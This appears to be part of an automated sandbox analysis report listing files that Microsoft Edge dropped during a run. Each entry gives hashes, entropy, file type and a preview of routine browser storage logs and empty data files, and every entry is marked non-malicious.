                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:32:36.924 c20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/03-17:32:37.034 c20 Recovering log #3.2025/01/03-17:32:37.050 c20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):319
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.113639411130633
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCPWTK8Qq2Pwkn23oH+TcwtrQMxIFUtfCPWYCwZZmw5CPWYTzkwOwkn23oH+Tv:7VBG8QvYfYebCFUtfBYX/5BYf5JfYebf
                                                                                                                                                                                                                                                                                  MD5:3B5EB668CAB1BF9E562937E23082D439
                                                                                                                                                                                                                                                                                  SHA1:ADB4D13792FED8DC3308D9EFCF193FC0C767E8A0
                                                                                                                                                                                                                                                                                  SHA-256:5155C216D08EE5480F3488559CC2DA4A41AD12591B08DF27BC95AAB76827E504
                                                                                                                                                                                                                                                                                  SHA-512:28AD5C15A132B48FF95E4F1506965C289027D213DA7D8FC7C9B3DB09B00490563DD66F6EBE55200B5D866F23BD011C8DA062C2C3C1D65EC2FE4EBCAC039EEE2F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:32:36.924 c20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/03-17:32:37.034 c20 Recovering log #3.2025/01/03-17:32:37.050 c20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1443
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7825549663964217
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:3oEa3ensCLsYKpsAF4unxAZtLp3X2amEtG1Chq7HQKkOAM4f:3oH3ensCLslzFwTLp2FEkChQwHOpe
                                                                                                                                                                                                                                                                                  MD5:07BD6583AD856C79AED00A276201DB61
                                                                                                                                                                                                                                                                                  SHA1:DCAF5F2C4089306DA449E8BFA66432FAEAA80F6C
                                                                                                                                                                                                                                                                                  SHA-256:2C27C8642FB374538432D69E3D2B1E4161EADF089A5C95B6559DDBF8F5620CA7
                                                                                                                                                                                                                                                                                  SHA-512:5E2EF971CCDF522A8677978326DD8533E198FDE7D3D420A93F7FA7015D506164EFDD32C1D96A476BBB60C67B80E1E79014D4E53FC76497D6FFD23BC5DB2DA8A0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SNSS.......7.ag...........7.ag......"7.ag...........7.ag.......7.ag.......8.ag.......8.ag....!..8.ag...............................7.ag8.ag1..,...8.ag$...cd6ac860_63c4_4768_9539_aedd19fc1290...7.ag.......8.ag......q........7.ag...7.ag.......................7.ag....................5..0...7.ag&...{1A5CCF63-1000-409F-B5C1-AFEC7F75D4D9}.....7.ag..........7.ag.......................8.ag...........8.ag........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x........I2..*.. I2..*.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                  MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                  SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                  SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                  SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):350
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.115948927442928
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCmH2QWM+q2Pwkn23oH+Tcwt7Uh2ghZIFUtfCmfG1Zmw5CmfQWMVkwOwkn23oz:7VN2Q+vYfYebIhHh2FUtfFG1/5FQV5J8
                                                                                                                                                                                                                                                                                  MD5:C8EC71EB539D877EA41375387700812C
                                                                                                                                                                                                                                                                                  SHA1:A907EA2927A4AF0419EF1E74C51C6794774C3FC5
                                                                                                                                                                                                                                                                                  SHA-256:E6C6C7C4C099CB7EC463C6908DA1EC470388505F6A469083B3B47879E4B13887
                                                                                                                                                                                                                                                                                  SHA-512:D476738FDCA60C76CE9588EC8B21D3E0867E1AE067D2A3234F58D612AF432B72FA55CDA0EDCEAFBE44FAC36135FAE25563EBF6A285A8F7657C39A6D3A8067676
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:00.954 19ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/03-17:33:00.955 19ac Recovering log #3.2025/01/03-17:33:00.955 19ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):350
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.115948927442928
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCmH2QWM+q2Pwkn23oH+Tcwt7Uh2ghZIFUtfCmfG1Zmw5CmfQWMVkwOwkn23oz:7VN2Q+vYfYebIhHh2FUtfFG1/5FQV5J8
                                                                                                                                                                                                                                                                                  MD5:C8EC71EB539D877EA41375387700812C
                                                                                                                                                                                                                                                                                  SHA1:A907EA2927A4AF0419EF1E74C51C6794774C3FC5
                                                                                                                                                                                                                                                                                  SHA-256:E6C6C7C4C099CB7EC463C6908DA1EC470388505F6A469083B3B47879E4B13887
                                                                                                                                                                                                                                                                                  SHA-512:D476738FDCA60C76CE9588EC8B21D3E0867E1AE067D2A3234F58D612AF432B72FA55CDA0EDCEAFBE44FAC36135FAE25563EBF6A285A8F7657C39A6D3A8067676
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:00.954 19ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/03-17:33:00.955 19ac Recovering log #3.2025/01/03-17:33:00.955 19ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):350
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.115948927442928
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:iOVCmH2QWM+q2Pwkn23oH+Tcwt7Uh2ghZIFUtfCmfG1Zmw5CmfQWMVkwOwkn23oz:7VN2Q+vYfYebIhHh2FUtfFG1/5FQV5J8
                                                                                                                                                                                                                                                                                  MD5:C8EC71EB539D877EA41375387700812C
                                                                                                                                                                                                                                                                                  SHA1:A907EA2927A4AF0419EF1E74C51C6794774C3FC5
                                                                                                                                                                                                                                                                                  SHA-256:E6C6C7C4C099CB7EC463C6908DA1EC470388505F6A469083B3B47879E4B13887
                                                                                                                                                                                                                                                                                  SHA-512:D476738FDCA60C76CE9588EC8B21D3E0867E1AE067D2A3234F58D612AF432B72FA55CDA0EDCEAFBE44FAC36135FAE25563EBF6A285A8F7657C39A6D3A8067676
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:33:00.954 19ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/03-17:33:00.955 19ac Recovering log #3.2025/01/03-17:33:00.955 19ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):524656
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.027445846313988E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:LsulyN5:Ls3N
                                                                                                                                                                                                                                                                                  MD5:FC7E3972F32C49F4F731DB6ACBD08EBC
                                                                                                                                                                                                                                                                                  SHA1:5A5AEB3CE2D7865E1CB2B00DF92EFD8D5290CB62
                                                                                                                                                                                                                                                                                  SHA-256:3DFD16ADE787C4C30AEE0B65C3B6F9F2BBAFE1EA368E6A478F6842996385EFB1
                                                                                                                                                                                                                                                                                  SHA-512:21A2D4EE5186856E43264C685831B0B341F16B9E42042F0C9F85C7358757B136F47EB123121195F04A3495E2BA52965E5E059EEF5457A4BBBB862CA0895BA78F
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:..........................................#k./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                                                                                                                                  Entropy (8bit):9.47693366977411E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:LsNl6:Ls36
                                                                                                                                                                                                                                                                                  MD5:5093A6745EB45F46FD695042069F281B
                                                                                                                                                                                                                                                                                  SHA1:4229520A128E0B6EA97D19E49857BD0EC5E2D1B5
                                                                                                                                                                                                                                                                                  SHA-256:BFD79F3714730D8561C636129B0925321E53872887223ECBD8DB95B2D6732BDD
                                                                                                                                                                                                                                                                                  SHA-512:2B729B1240213554ED0C1704DF145D3A842B4F61A237DA1424516C8A5F9489814ED532ABE0966BF744985C11592407CCC4F5F0FC4262157B5A9006A4C5827727
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...........................................#k./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):432
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.249295432386564
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:7VBYLIvYfYebvqBQFUtfBYSX/5BYmB5JfYebvqBvJ:7VWOYfYebvZgfWSBWiJfYebvk
                                                                                                                                                                                                                                                                                  MD5:E91EB69994B4056F2CF5CDA4EED613E6
                                                                                                                                                                                                                                                                                  SHA1:00831FF83D56D57E4856724097538A24A0F7914A
                                                                                                                                                                                                                                                                                  SHA-256:8039F5D7E0C228B0FAE0FF479C2BA42609075F3A610F5040371F0A3E004D9355
                                                                                                                                                                                                                                                                                  SHA-512:598C981E80F496D1B631B16AF46146B9D129DA1F139DA835E490FF99A7074D8CCDBC7FAC4A971BD7850036053D18E5C5D3DC4C3D80B41FEC973BBB65C3D4792C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:32:37.058 1e18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/03-17:32:37.059 1e18 Recovering log #3.2025/01/03-17:32:37.066 1e18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):432
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.249295432386564
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:7VBYLIvYfYebvqBQFUtfBYSX/5BYmB5JfYebvqBvJ:7VWOYfYebvZgfWSBWiJfYebvk
                                                                                                                                                                                                                                                                                  MD5:E91EB69994B4056F2CF5CDA4EED613E6
                                                                                                                                                                                                                                                                                  SHA1:00831FF83D56D57E4856724097538A24A0F7914A
                                                                                                                                                                                                                                                                                  SHA-256:8039F5D7E0C228B0FAE0FF479C2BA42609075F3A610F5040371F0A3E004D9355
                                                                                                                                                                                                                                                                                  SHA-512:598C981E80F496D1B631B16AF46146B9D129DA1F139DA835E490FF99A7074D8CCDBC7FAC4A971BD7850036053D18E5C5D3DC4C3D80B41FEC973BBB65C3D4792C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2025/01/03-17:32:37.058 1e18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/03-17:32:37.059 1e18 Recovering log #3.2025/01/03-17:32:37.066 1e18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
